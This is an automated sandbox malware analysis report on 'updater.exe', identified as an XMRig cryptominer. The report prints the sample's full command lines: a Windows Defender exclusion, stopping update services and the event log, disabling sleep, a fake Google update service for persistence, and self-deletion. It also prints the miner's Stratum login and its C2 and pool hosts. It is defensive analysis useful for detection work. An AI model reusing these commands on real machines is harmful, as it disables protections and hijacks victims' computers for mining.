Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample name:updater.exe
Analysis ID:1526527
MD5:a0c374f31894aa332d158f56608c89c3
SHA1:0236445a761fca6dcda1b9014beb78198dfae9f8
SHA256:ce7ca5446e66ce1e9190e16922fa33febb0789f27561aa820d1d1bf14c86cfe1
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Self deletion via cmd or bat file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Uses powercfg.exe to modify the power settings
Abnormal high CPU Usage
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • updater.exe (PID: 5060 cmdline: "C:\Users\user\Desktop\updater.exe" MD5: A0C374F31894AA332D158F56608C89C3)
    • powershell.exe (PID: 7724 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1316 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 2600 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • sc.exe (PID: 5928 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 2248 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 32 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7596 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 452 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5412 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 3628 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 7012 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 1932 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5588 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3028 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 308 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7972 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4640 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • choice.exe (PID: 2248 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
  • updater.exe (PID: 3352 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: A0C374F31894AA332D158F56608C89C3)
    • powershell.exe (PID: 6340 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1400 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • wusa.exe (PID: 4688 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: E43499EE2B4CF328A81BACE9B1644C5D)
    • sc.exe (PID: 6772 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 5192 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 1604 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 7456 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • sc.exe (PID: 3376 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5240 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 5812 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 4432 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powercfg.exe (PID: 2872 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • conhost.exe (PID: 2404 cmdline: C:\Windows\system32\conhost.exe MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • svchost.exe (PID: 6248 cmdline: svchost.exe MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: svchost.exe PID: 6248JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: svchost.exe PID: 6248MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x20e73:$a1: mining.set_target
        • 0x1d61c:$a2: XMRIG_HOSTNAME
        • 0x1e394:$a3: Usage: xmrig [OPTIONS]
        • 0x1d5fd:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        62.2.svchost.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          62.2.svchost.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight
          62.2.svchost.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          62.2.svchost.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5412, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
          Sigma detected: Suspect Svchost Activity
          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 3028, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7724, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\Google\Chrome\updater.exe, ParentImage: C:\ProgramData\Google\Chrome\updater.exe, ParentProcessId: 3352, ParentProcessName: updater.exe, ProcessCommandLine: svchost.exe, ProcessId: 6248, ProcessName: svchost.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\updater.exe", ParentImage: C:\Users\user\Desktop\updater.exe, ParentProcessId: 5060, ParentProcessName: updater.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 308, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-06T01:46:18.491045+020020510042Crypto Currency Mining Activity Detected192.168.11.2049758172.67.162.2980TCP
          2024-10-06T01:47:17.850114+020020510042Crypto Currency Mining Activity Detected192.168.11.2049760172.67.162.2980TCP
          2024-10-06T01:48:19.635954+020020510042Crypto Currency Mining Activity Detected192.168.11.2049761172.67.162.2980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-06T01:46:02.663461+020028269302Crypto Currency Mining Activity Detected192.168.11.20497575.161.70.18923333TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for domain / URL
          Source: auto.c3pool.orgVirustotal: Detection: 6%Perma Link
          Source: minerchenzhi888.topVirustotal: Detection: 12%Perma Link
          Source: http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=Virustotal: Detection: 9%Perma Link
          Source: http://minerchenzhi888.top/api/endpoint.phpVirustotal: Detection: 8%Perma Link
          Source: http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblxVirustotal: Detection: 9%Perma Link
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 95%
          Source: C:\ProgramData\Google\Chrome\updater.exeVirustotal: Detection: 82%Perma Link
          Multi AV Scanner detection for submitted file
          Source: updater.exeReversingLabs: Detection: 95%
          Source: updater.exeVirustotal: Detection: 82%Perma Link

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTR
          Detected Stratum mining protocol
          Source: global trafficTCP traffic: 192.168.11.20:49757 -> 5.161.70.189:23333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"49fzyjh446z9uuadh1zmpzggiiycsvfxgcxbthdws6ogai4mpo1z9f52bf3pdhmq6gk92hbx9gpdqgunz2pkcvstb8xynxf","pass":"miner-49","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
          Found strings related to Crypto-Mining
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exeString found in binary or memory: cryptonight-monerov7
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: updater.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.dr
          Source: global trafficTCP traffic: 192.168.11.20:49757 -> 5.161.70.189:23333
          Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49761 -> 172.67.162.29:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49758 -> 172.67.162.29:80
          Source: Network trafficSuricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.11.20:49760 -> 172.67.162.29:80
          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.11.20:49757 -> 5.161.70.189:23333
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: auto.c3pool.org
          Source: global trafficDNS traffic detected: DNS query: minerchenzhi888.top
          Source: unknownHTTP traffic detected: POST /api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 467Content-Type: application/jsonHost: minerchenzhi888.topUser-Agent: cpp-httplib/0.12.6
          Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
          Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmp, zlvyxohjpfnw.sys.36.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
          Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD626000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://minerchenzhi888.top/api/endpoint.php
          Source: svchost.exe, 0000003E.00000002.346493278590.00000254DD65F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://minerchenzhi888.top/api/endpoint.php--cinit-version=3.4.0--cinit-idle-wait=1--cinit-idle-cpu=
          Source: svchost.exe, 0000003E.00000002.346493622809.00000254DD6F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://minerchenzhi888.top/api/endpoint.phpT
